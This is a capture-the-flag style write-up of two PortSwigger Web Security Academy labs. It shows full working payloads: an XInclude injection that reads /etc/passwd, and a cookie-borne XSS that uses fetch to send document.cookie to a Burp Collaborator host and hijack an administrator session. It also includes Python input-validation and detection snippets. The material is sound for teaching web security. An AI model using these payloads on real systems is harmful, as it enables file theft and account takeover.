Burp Web Academy Essential Skills

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy is the free web security training ground officially released by Burp Suite. While learning web security, you can also practise hands-on Burp Suite skills.

This article walks through the Essential Skills section of the Web Security Academy.

0x02. Essential Skills

2.1 Lab: Discovering vulnerabilities quickly with targeted scanning

This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of /etc/passwd within 10 minutes.

Due to the tight time limit, we recommend using Burp Scanner to help you. You can obviously scan the entire site to identify the vulnerability, but this might not leave you enough time to solve the lab. Instead, use your intuition to identify endpoints that are likely to be vulnerable, then try running a targeted scan on a specific request. Once Burp Scanner has identified an attack vector, you can use your own expertise to find a way to exploit it.

After opening the target system, I found that the product detail page has a stock check feature:

POST /product/stock HTTP/2
Host: 0ae0005e03636a878056674400f80036.web-security-academy.net
Cookie: session=i9MgRqLvPyTzSRzyOjpeu8wMFOjANkOq
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Accept: */*

productId=4&storeId=1

As the hint suggests, Burp Scanner can be used, but the lab has a time limit, so instead I sent the request straight to the Do Active Scan menu item to test only this API endpoint. On Burp's Dashboard page an XML Injection finding appeared very quickly:

POST /product/stock HTTP/2
Host: 0ae0005e03636a878056674400f80036.web-security-academy.net
Cookie: session=i9MgRqLvPyTzSRzyOjpeu8wMFOjANkOq
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Accept: */*

productId=%3crir%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2far5fnqihrdtfwbmeyjqh2nyv6mcf05o6cyzond.oastify.com%2ffoo%22%2f%3e%3c%2frir%3e&storeId=1

The decoded payload:

<rir xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://ar5fnqihrdtfwbmeyjqh2nyv6mcf05o6cyzond.oastify.com/foo"/></rir>

The HTTP response:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 57

"Invalid product ID: xo3nj1ouuvoiv4xkq4yo00zjlgigtgkfigz"

The string xo3nj1ouuvoiv4xkq4yo00zjlgigtgkfigz in the error message is the content returned by http://ar5fnqihrdtfwbmeyjqh2nyv6mcf05o6cyzond.oastify.com/foo, so this is clearly an XML injection vulnerability.

Now the URL needs to be replaced with a local file path; see What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy:

XInclude attacks

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service.

In this situation, you cannot carry out a classic XXE attack, because you don’t control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

In other words, when we cannot control the whole XML document to carry out an XXE attack, we can try XInclude to achieve a similar effect through a single XML element. URL-encode the payload above and place it in the productId parameter.

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2338

"Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......
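As an added defender-side example (not part of this write-up or the lab's code), here is how a stock-check back end can build its XML so that the client's productId can never become markup, together with a check that flags XInclude payloads in a URL-encoded form body. The back-end XML layout and the function names are assumptions; the attack body below is constructed in the shape of the lab payload.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def build_stock_request(product_id: str, store_id: str) -> str:
    """Build the back-end XML (assumed layout) for a stock check.

    Both values are validated as small positive integers before they are
    placed into the document, and ElementTree assigns them as text, so any
    '<' or '&' that slipped through would be escaped, not parsed as markup.
    """
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise ValueError(f"Invalid {name}: must be a positive integer")
    root = ET.Element("stockCheck")
    ET.SubElement(root, "productId").text = product_id
    ET.SubElement(root, "storeId").text = store_id
    return ET.tostring(root, encoding="unicode")


def find_xinclude(form_body: str) -> list:
    """Return the form fields whose URL-decoded value carries the XInclude
    namespace or an xi:include element (useful for logging or WAF rules)."""
    hits = []
    for field, values in parse_qs(form_body, keep_blank_values=True).items():
        if any(XINCLUDE_NS in v or "xi:include" in v for v in values):
            hits.append(field)
    return hits


# Constructed sample bodies: a normal stock check and the lab payload shape.
NORMAL_BODY = "productId=4&storeId=1"
ATTACK_BODY = (
    "productId=%3cfoo%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e"
    "%3cxi%3ainclude%20parse%3d%22text%22%20href%3d%22file%3a%2f%2f%2fetc%2fpasswd%22%2f%3e"
    "%3c%2ffoo%3e&storeId=1"
)

if __name__ == "__main__":
    print(build_stock_request("4", "1"))
    print("flagged fields:", find_xinclude(ATTACK_BODY))
```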

2.2 Lab: Scanning non-standard data structures

This lab contains a vulnerability that is difficult to find manually. It is located in a non-standard data structure.

To solve the lab, use Burp Scanner’s Scan selected insertion point feature to identify the vulnerability, then manually exploit it and delete carlos.

You can log in to your own account with the following credentials: wiener:peter

The location of Scan selected insertion point differs between Burp Suite versions. Online, v2023.10.3.6 has this feature in the Burp Repeater right-click menu, whereas the Burp Suite Pro v2022.9 I use has no such option in the Repeater context menu.

After looking around, I found it in Burp Intruder. We first need to mark the username in the Cookie; the field marked with § in Intruder is the so-called insertion point.

GET /my-account?id=wiener HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session=§wiener§%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

Then right-click and choose Scan defined insertion point from the menu; the name differs slightly from Scan selected insertion point. The first scan showed nothing at all on the Dashboard page; I had to resend the request from Burp Intruder to the existing Task before the XSS vulnerability was found, which is a bit odd.

The XSS payload:

GET /my-account?id=wiener HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f2dgr3z719psdx3m3qu50u2rfp6vzjp7hx5ovblza%5c.oastify.com%60%3e%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

Decoded:

'"><svg/onload=fetch`//2dgr3z719psdx3m3qu50u2rfp6vzjp7hx5ovblza\.oastify.com`>:fK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

There is a pitfall here: written as above (fetch's argument without parentheses) it works when only the domain is requested, but once the cookie is appended, nothing arrives in Burp Collaborator. So, following the official solution, fetch(`...`) is used here.

Now copy an address from the Burp Collaborator page and put it into our payload:

GET /my-account?id=wiener HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session='%22%3e%3csvg%2fonload%3dfetch(%60%2f%2fcaqlal36hoxzswk7v1v9ywvd44avylma.oastify.com%2f%24%7bencodeURIComponent(document.cookie)%7d%60)%3e%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

The decoded payload:

'"><svg/onload=fetch(`//caqlal36hoxzswk7v1v9ywvd44avylma.oastify.com/${encodeURIComponent(document.cookie)}`)>:fK5Qkj4iCasnn1v4m7acZiqEVKd2o65E

The administrator's cookie is received in Burp Collaborator:

GET /session%3Dadministrator%253a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN%3B%20secret%3DYrOMza2cQ2ee89bvPLT1WW1pFIGRm8Cr%3B%20session%3Dadministrator%253a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN HTTP/1.1

Decoded:

session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN; secret=YrOMza2cQ2ee89bvPLT1WW1pFIGRm8Cr; session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN

Use this cookie to access the site and then delete the user carlos.

GET /admin/delete?username=carlos HTTP/2
Host: 0ad10064032d4f63810f27c00075004e.web-security-academy.net
Cookie: session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN; secret=YrOMza2cQ2ee89bvPLT1WW1pFIGRm8Cr; session=administrator%3a5E9Zn9tghFwrNGFZmw4DajT6d6hPu2hN
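The vulnerable lab decodes the `username:token` session cookie and reflects the username without escaping. As an added example (not the lab's or this write-up's code), the following Python parses that non-standard cookie structure, validates the username part, escapes it on reflection, and runs the check over constructed log lines. The log line format, the function names and the username character set are assumptions.

```python
import html
import re
from urllib.parse import unquote

# Assumed allowed username alphabet for the session cookie's username part.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def parse_session_cookie(cookie_header: str):
    """Return (username, token) from a lab-style 'session=<user>%3a<token>'
    cookie (assumed format), or None if it is absent or has no separator.
    The split is on the last ':' so a ':' inside the username is kept."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            user, sep, token = unquote(value).rpartition(":")
            return (user, token) if sep else None
    return None


def username_is_safe(user: str) -> bool:
    return USERNAME_RE.fullmatch(user) is not None


def render_account_heading(user: str) -> str:
    """Reflect the username into HTML with escaping, so any markup in the
    cookie is rendered as text instead of being executed."""
    return f"<h1>Your username is: {html.escape(user, quote=True)}</h1>"


def flag_requests(log_lines):
    """Return (line_no, decoded username) for constructed log lines of the
    form '<method> <path> cookie=<Cookie header>' whose username part
    fails validation; such requests deserve a closer look."""
    flagged = []
    for n, line in enumerate(log_lines, 1):
        _, _, cookie = line.partition("cookie=")
        parsed = parse_session_cookie(cookie)
        if parsed and not username_is_safe(parsed[0]):
            flagged.append((n, parsed[0]))
    return flagged


# Constructed sample log: a normal request and one carrying markup in the
# username part of the cookie, in the shape seen in the lab.
SAMPLE_LOG = [
    "GET /my-account?id=wiener cookie=session=wiener%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E",
    "GET /my-account?id=wiener cookie=session='%22%3e%3csvg%2fonload%3dalert(1)%3e%3afK5Qkj4iCasnn1v4m7acZiqEVKd2o65E",
]

if __name__ == "__main__":
    for line_no, user in flag_requests(SAMPLE_LOG):
        print(f"line {line_no}: suspicious username part -> {render_account_heading(user)}")
```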

0x03. Summary

  • Achieving an XXE-like attack effect via XInclude

  • Getting familiar with how to use Burp Scanner

    • Quick scan of a specific API - Active Scan
    • Scan of a specific field - Scan defined insertion point or Scan selected insertion point
  • Usage of fetch

  • JavaScript template literal parameters

`${expression}`

0x04. References

  1. https://portswigger.net/web-security/all-labs#essential-skills
  2. https://portswigger.net/web-security/xxe